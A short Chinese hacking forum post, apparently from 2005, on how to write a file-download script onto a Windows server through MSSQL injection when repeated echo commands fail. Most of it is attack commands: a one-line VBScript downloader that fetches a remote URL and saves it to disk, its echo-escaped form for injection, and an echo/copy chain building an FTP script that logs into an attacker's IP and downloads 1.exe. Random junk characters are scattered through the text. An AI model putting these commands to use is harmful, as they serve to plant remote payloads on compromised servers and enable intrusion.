QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 2856|回复: 0
打印 上一主题 下一主题

mssql注射时不可以多次echo的解决办法

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2005-1-23 13:30 |只看该作者 |倒序浏览
|招呼Ta 关注Ta
<>解决办法: $ V( H9 f1 p& E  l8 u' J3 W( x
1.iget.vbs一次写入
3 Y- [) c- k% }& ~在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写   @1 B3 E# `2 J( {

5 n* h% i5 D& `$ U5 ~+ m$ WSet x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject("ADODB.Stream"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2
4 h& y% Z2 Y* q  d( \5 R9 \6 V; ^/ K3 R' o1 E+ V1 {) \
这样我们可以一次echo成功,echo版本:
. S7 d* ?" _: M* ]2 A: w; c/ d1 q/ i2 ~9 V' l9 j, g
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 &gt;iget.vbs
: j( z; |1 C/ F  k2 G: D* N/ c0 O" l

' i, S5 j2 p1 d( p- [( [2.bat调用ftp脚本的写法(by envymask) 3 Q4 S  h% Z" `) d" [7 `" W1 Z  X
# j$ J2 S( @. Y0 ]+ w) Y, s  A
echo ftp&gt;1.vbs ) Y# b2 y, _! ~7 S( @# p3 `/ t0 u9 H9 {
echo open ip&gt;2.vbs
- i! x0 l* E2 ^5 Q: W- necho u&gt;3.vbs
, @9 j( y  R, n( ^/ ^1 X6 Qecho s&gt;4.vbs . ]; x4 y5 R5 g8 i9 C$ J
echo binary&gt;5.vbs
, J! e$ n$ |# [echo get 1.exe&gt;6.vbs
, l+ s7 G8 m% |6 L: ^echo bay&gt;7.vbs 9 [. X0 b+ x) t* B

& G* ^2 E% a" Q- i3 Bcopy 1.vbs+2.vbs+3.vbs+4.vbs+5.vbs+6.vbs+7.vbs new.vbs : t2 ]/ \/ z- c; _) q
</P>
zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-6-11 17:57 , Processed in 0.421762 second(s), 52 queries .

回顶部